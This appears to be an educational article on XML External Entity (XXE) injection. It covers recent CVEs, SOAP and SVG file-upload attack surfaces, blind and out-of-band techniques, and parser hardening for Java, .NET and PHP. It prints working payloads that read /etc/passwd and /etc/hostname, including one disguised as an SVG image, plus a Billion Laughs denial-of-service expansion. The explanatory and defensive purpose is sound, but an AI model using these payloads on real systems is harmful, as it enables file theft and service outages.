XML External Entity (XXE): The Legacy Vulnerability That Still Haunts Modern Apps 📄

Introduction: The “Old” Threat That Refuses to Die

In the rapidly evolving landscape of cybersecurity, where new vulnerabilities emerge daily, XML External Entity (XXE) injection stands as a stark reminder that legacy threats can be just as dangerous as cutting-edge exploits. Despite being well-documented for over a decade, XXE vulnerabilities continue to plague modern applications in 2025, with recent high-profile discoveries proving that even major technology companies aren’t immune.

In early 2025, security researchers discovered a critical XXE vulnerability in Akamai CloudTest that allowed attackers to access server files and exfiltrate sensitive data like the /etc/passwd file. Similarly, CVE-2025-23195 exposed an XXE vulnerability in the Ambari/Oozie project that could be exploited to read arbitrary files or perform server-side request forgery attacks. These recent incidents underscore a troubling reality: organizations continue to deploy XML parsers with insecure default configurations, leaving applications vulnerable to attacks that were preventable years ago.

Understanding XXE: A Technical Deep Dive

What is XXE Injection?

XML External Entity injection is a web security vulnerability that allows attackers to interfere with an application’s processing of XML data by exploiting how XML parsers handle external entities. External entities are custom XML entities whose values are loaded from outside the Document Type Definition (DTD), allowing them to reference local file paths or URLs.

The fundamental issue stems from the XML specification itself. The XML processor replaces occurrences of external entities with content retrieved from the system identifier, which can be a file path or URL. When an application fails to properly configure its XML parser, attackers can manipulate this mechanism to access resources that should remain protected.

The Anatomy of an XXE Attack

A basic XXE payload demonstrates the simplicity yet effectiveness of this attack:

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

When the XML parser processes this payload without proper security controls, it resolves the external entity and injects the system file content directly into the XML output, potentially exposing operating system-level data without requiring any credentials.

The Three Pillars of XXE Exploitation

1. File Disclosure Attacks: The Information Goldmine

File disclosure attacks allow adversaries to access local system files through malicious XML entities, revealing sensitive information including configuration files, password files, and application source code. This capability transforms what might seem like a simple parsing vulnerability into a complete system compromise vector.

Attackers typically target high-value files such as: - /etc/passwd and /etc/shadow on Unix systems - Windows registry keys - Application configuration files containing database credentials - Cloud metadata endpoints (AWS, Azure, GCP) - Private SSH keys and SSL certificates

The danger extends beyond simple file reading. Attackers can perform out-of-band data exfiltration by reading local files and transmitting the contents to remote servers they control.

2. Server-Side Request Forgery (SSRF): Breaking Internal Boundaries

XXE vulnerabilities can be leveraged to perform SSRF attacks, where the server-side application is induced to make HTTP requests to any URL that the server can access. This capability is particularly dangerous in cloud environments and internal networks.

Through SSRF exploitation via XXE, attackers can: - Probe internal network infrastructure and map internal systems - Access cloud metadata services to steal credentials - Bypass firewall rules and access restricted internal APIs - Pivot from external-facing systems to internal resources

GeoServer’s recent CVE-2025-30220 vulnerability demonstrated how XXE could be exploited to trick the application into making HTTP requests to internal or arbitrary external systems, highlighting the continued relevance of this attack vector.

3. Denial of Service: The Billion Laughs Attack

The “Billion Laughs” attack exploits recursive entity declarations to exponentially expand entities during parsing, consuming massive amounts of memory and potentially crashing systems. This attack is particularly dangerous because the payload itself is fairly small, but the expansion during parsing can completely overwhelm server resources.

A typical Billion Laughs payload creates nested entity definitions that expand exponentially:

<!DOCTYPE root [
  <!ENTITY e "e">
  <!ENTITY e1 "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
  <!ENTITY e2 "&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;">
  <!ENTITY e3 "&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;">
]>
<root>&e3;</root>

When parsed, this small payload can expand to consume gigabytes of memory, bringing production systems to their knees.

Why SOAP APIs Remain Ground Zero for XXE

The SOAP-XML Dependency

SOAP APIs almost universally rely on XML parsing, making them inherently vulnerable to XXE attacks and XPath injection. Unlike modern REST APIs that primarily use JSON, SOAP’s strict adherence to XML creates an expanded attack surface that many organizations fail to properly secure.

SOAP continues to power critical operations across finance, healthcare, and government sectors due to its reliability, auditability, and transactional integrity. This widespread use in high-value systems makes SOAP endpoints prime targets for sophisticated attackers.

The Akamai CloudTest Case Study

The recent discovery of CVE-2025-49493 in Akamai CloudTest revealed that multiple SOAP endpoints under /concerto/services were vulnerable to XXE attacks. Security researchers found that most endpoints in this path shared the same vulnerability, demonstrating how a single misconfiguration can expose an entire service infrastructure.

The Akamai case is instructive because it demonstrates several key points: - Systematic exposure: When one SOAP endpoint is vulnerable, often multiple endpoints share the same flaw - Delayed discovery: Despite being a major technology provider, the vulnerability persisted until 2025 - Real-world impact: Attackers could access sensitive server files and environment variables

The vulnerability was ultimately fixed by disabling DTD processing entirely at the parser level, preventing XXE attacks at their source.

Legacy Systems and Technical Debt

Many SOAP APIs remain stagnant, running on outdated libraries and frameworks that were last updated a decade ago. Recent research revealed that XSW vulnerabilities in Germany’s Personal Health Record system could be exploited to circumvent authentication, demonstrating the real-world consequences of these threats.

The problem is compounded by the fact that SOAP services often operate deep within organizational infrastructure: - Core banking systems processing millions of transactions - Healthcare systems managing patient records - Supply chain integrations connecting multiple enterprises - Legacy government systems that cannot be easily replaced

File Upload Features: The Overlooked Attack Vector

SVG Files as XXE Carriers

Some common file formats use XML or contain XML subcomponents, with SVG being a primary example. An application might allow users to upload images and process them on the server, but if the image processing library supports SVG format, attackers can submit malicious SVG images to reach hidden XXE attack surfaces.

A malicious SVG file can contain XXE payloads disguised as legitimate image markup:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ 
  <!ENTITY xxe SYSTEM "file:///etc/hostname"> 
]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

When this SVG is processed, the contents of sensitive files can be displayed directly within the rendered image, making detection more difficult.

Second-Order XXE: The Delayed Threat

Second-order XXE injections represent a more sophisticated variant where malicious payloads are first stored and later retrieved and executed. These vulnerabilities are particularly prevalent in import/export features that run asynchronously, where user-supplied XML files are queued for background processing.

This delayed execution model creates several challenges: - Traditional security testing may not trigger the vulnerability - The injection point and execution context are separated - Payloads can persist in databases or file systems - Attribution becomes more difficult

Beyond SVG: Other XML-Based File Formats

Document viewers and converters that process XML-based documents like DOCX and XLSX files represent common targets for XXE exploitation. Modern office document formats are essentially ZIP archives containing XML files. When applications extract and parse these XML components without proper validation, they become vulnerable to XXE attacks.

Even audio files can be exploited, as demonstrated by CVE-2021-29447 in WordPress, where MP3 files using the ID3 library for metadata parsing were vulnerable to XXE attacks.

Why XXE Persists in 2025: Root Causes

Default Insecure Parser Configurations

Most XML parsers process external entities by default, resulting in servers executing system code embedded in malicious XML elements unless explicitly configured otherwise. This “insecure by default” design choice creates a situation where developers must actively harden their parsers rather than benefiting from secure defaults.

Invisible XML Processing

Some REST APIs are unintentionally configured to accept data in multiple formats, including XML, even when developers assume they’re only handling JSON. Applications may accept Content-Type: application/xml or automatically convert between formats, creating hidden XXE attack surfaces that developers aren’t aware exist.

Complex Application Architectures

Web applications can contain numerous components, each potentially including an XML parser, making it difficult to ascertain which parts of the application process XML. In some cases, application owners have no access to the configuration of XML parsers used by specific third-party components.

Modern applications often integrate: - Multiple microservices with their own XML parsers - Third-party libraries and frameworks - Legacy components with undocumented XML processing - Cloud services that may accept XML inputs

False Sense of Security

The structured verbosity of XML creates an illusion of security, but the complexity of XML parsing actually introduces its own attack surface. It’s a dangerous fallacy to think that internal SOAP services operate safely simply because they reside behind a firewall.

Organizations often make flawed assumptions: - “We only use JSON, so we’re safe from XXE” - “Our XML endpoints are internal-only” - “We disabled external entities years ago” (without verifying all parsers) - “Our WAF protects against XXE attacks”

Advanced XXE Techniques: Bypassing Defenses

Blind XXE Exploitation

Many XXE vulnerabilities are blind, meaning the application does not return the values of defined external entities in its responses, making direct retrieval of server-side files impossible. Blind XXE can still be detected and exploited using out-of-band techniques to exfiltrate data and trigger XML parsing errors that disclose sensitive information in error messages.

External DTD Bypass

When security filters block the file:// protocol, attackers can declare their DTD in an external file to bypass filtering entirely. By crafting XXE payloads that make vulnerable applications reach out to attacker-controlled servers to load malicious DTD files, they can execute payloads without specifying blocked protocols directly.

Parameter Entity Exploitation

Parameter entities can be used to bypass protections and filters that block regular external entities. This technique involves defining parameter entities within external DTDs, which are then processed to construct the final attack payload.

Comprehensive Defense Strategies

Parser-Level Hardening

XML parsers should be configured with security-first settings that include disabling Document Type Definition (DTD) processing when not required. For most applications, completely disabling DTD processing is the most effective defense:

For Java applications:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

For .NET applications:

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;

For PHP applications:

libxml_disable_entity_loader(true);

Input Validation and Sanitization

Systems must check for external entity declarations together with suspicious entity references during XML schema validation. Documents should be validated against schemas to ensure they match expected formats before processing.

Implement whitelist-based validation: - Define allowed XML structures and reject deviations - Strip DOCTYPE declarations before processing - Validate against known-good schemas - Reject XML containing entity declarations

Network-Level Controls

Network segmentation should be deployed to isolate XML processing systems from sensitive internal resources, limiting the potential impact of XXE attacks. This defense-in-depth approach includes:

Placing XML-processing services in DMZ networks
Restricting outbound connections from XML parsers
Implementing strict egress filtering
Blocking access to cloud metadata endpoints (169.254.169.254)
Monitoring unusual file access patterns and network requests

Application Architecture Improvements

Content Security Policies should be implemented to prevent unauthorized resource access and limit XML processing capabilities. Modern application architectures should:

Minimize XML usage in favor of JSON where possible
Isolate XML processing to dedicated, hardened services
Implement least-privilege access controls
Use secure XML processing libraries with frequent updates
Conduct regular security audits of XML-handling code

Development Pipeline Integration

XXE vulnerability testing should be integrated into continuous integration and deployment pipelines to ensure that new code changes do not introduce vulnerabilities. This includes:

Static Application Security Testing (SAST) to identify insecure parser configurations
Dynamic Application Security Testing (DAST) to detect runtime XXE vulnerabilities
Software Composition Analysis (SCA) to track vulnerable XML libraries
Security-focused code reviews for all XML-handling modifications
Automated regression testing for XXE vulnerabilities

Real-World Impact: Recent CVEs Tell the Story

CVE-2025-49493: Akamai CloudTest

This vulnerability demonstrated how SOAP services across multiple endpoints could share the same XXE flaw, allowing attackers to exfiltrate sensitive environment variables and system files. The incident highlighted the systemic nature of XXE vulnerabilities in enterprise SOAP infrastructure.

CVE-2025-23195: Apache Ambari

An XXE vulnerability in the Ambari/Oozie project occurred due to insecure parsing of XML input using the DocumentBuilderFactory class without disabling external entity resolution. This case demonstrates how even well-established open-source projects can harbor XXE vulnerabilities.

CVE-2025-30220: GeoServer WFS Service

This high-severity vulnerability in GeoServer stemmed from improper handling of XML schemas within the GeoTools library, bypassing entity resolution controls and creating attack vectors through WFS endpoints. The vulnerability affected a widely-deployed geospatial server, underscoring XXE’s reach into specialized application domains.

Industry-Specific Challenges

Healthcare Systems

The migration of Electronic Health Records to the cloud has raised concerns about patient privacy, necessitating robust authentication and XML security controls. Healthcare systems face unique challenges:

Legacy HL7 and FHIR implementations using XML
HIPAA compliance requirements for data protection
Integration with multiple third-party systems
²⁴⁄₇ availability requirements limiting patching windows

Financial Services

Core banking systems rely on SOAP for complex, high-assurance transactions where reliability and transactional integrity are non-negotiable. Financial institutions must balance:

Real-time transaction processing requirements
Regulatory compliance mandates
Integration with legacy mainframe systems
Zero-downtime upgrade constraints

Government Infrastructure

Government systems present particularly challenging XXE risks due to: - Decades-old SOAP-based systems that cannot be easily replaced - Multi-vendor integration requirements - Strict certification and accreditation processes - Budget constraints limiting modernization efforts - High-value targets for nation-state adversaries

Monitoring and Detection

Logging and Alerting

Comprehensive logging and monitoring should be implemented to detect potential XXE attack attempts, including unusual file access patterns and network requests. Effective monitoring includes:

Tracking all XML parsing operations
Alerting on DOCTYPE declarations in untrusted input
Monitoring file system access from XML parser processes
Detecting unusual outbound connections from application servers
Correlating security events across multiple layers

Indicators of Compromise

Organizations should monitor for: - XML payloads containing SYSTEM or PUBLIC keywords - Requests to cloud metadata endpoints (169.254.169.254) - Access to sensitive system files from web application processes - Large XML documents or deeply nested structures - Error messages revealing file paths or internal system details

The Path Forward: Evolving Beyond XXE

Adopting Modern Data Formats

Organizations should evaluate opportunities to migrate from XML to JSON or other modern formats that don’t carry the same inherent security risks. While not always feasible for legacy systems, new development should default to safer alternatives.

Security Awareness and Training

True security begins before the code—in assumptions, in architecture, and in culture. Development teams need:

Regular training on XXE and other injection vulnerabilities
Security champions within engineering teams
Secure coding guidelines specific to XML handling
Threat modeling sessions for XML-processing features

Vendor Security Requirements

When procuring software or services, organizations should: - Require vendors to demonstrate XXE protections - Include XXE testing in acceptance criteria - Mandate secure XML parser configurations - Request regular security assessments and penetration tests

Conclusion: An “Old” Threat With Modern Consequences

XXE vulnerabilities represent a paradox in modern cybersecurity: a well-understood, thoroughly documented vulnerability that continues to compromise systems in 2025. Recent CVEs affecting major technology companies and open-source projects demonstrate that XXE remains a critical threat despite decades of awareness.

The persistence of XXE vulnerabilities stems from multiple factors: insecure parser defaults, complex application architectures, legacy system constraints, and the invisible nature of XML processing in modern applications. SOAP APIs continue to power critical operations in finance, healthcare, and government, making their security paramount. File upload features, particularly those processing SVG and other XML-based formats, create additional attack surfaces that developers frequently overlook.

The solution requires a multi-layered approach: hardening XML parsers, implementing robust input validation, deploying network segmentation, integrating security testing into development pipelines, and fostering a security-conscious culture. Organizations cannot afford to dismiss XXE as a “legacy” vulnerability—the 2025 threat landscape proves it remains very much alive.

As we move forward, the lesson is clear: in cybersecurity, “old” doesn’t mean “irrelevant.” The fundamentals matter, and failing to address well-known vulnerabilities like XXE can have devastating consequences, regardless of how sophisticated an organization’s other security measures might be. The haunting of modern applications by XXE will continue until the industry collectively commits to secure-by-default configurations and comprehensive defense strategies.

Keywords: XML External Entity, XXE vulnerability, SOAP API security, XML injection, file upload vulnerabilities, XXE prevention, web application security, server-side request forgery, XXE exploitation, XML parser security, CVE-2025-49493, blind XXE, XXE SSRF, billion laughs attack, SVG XXE, SOAP security 2025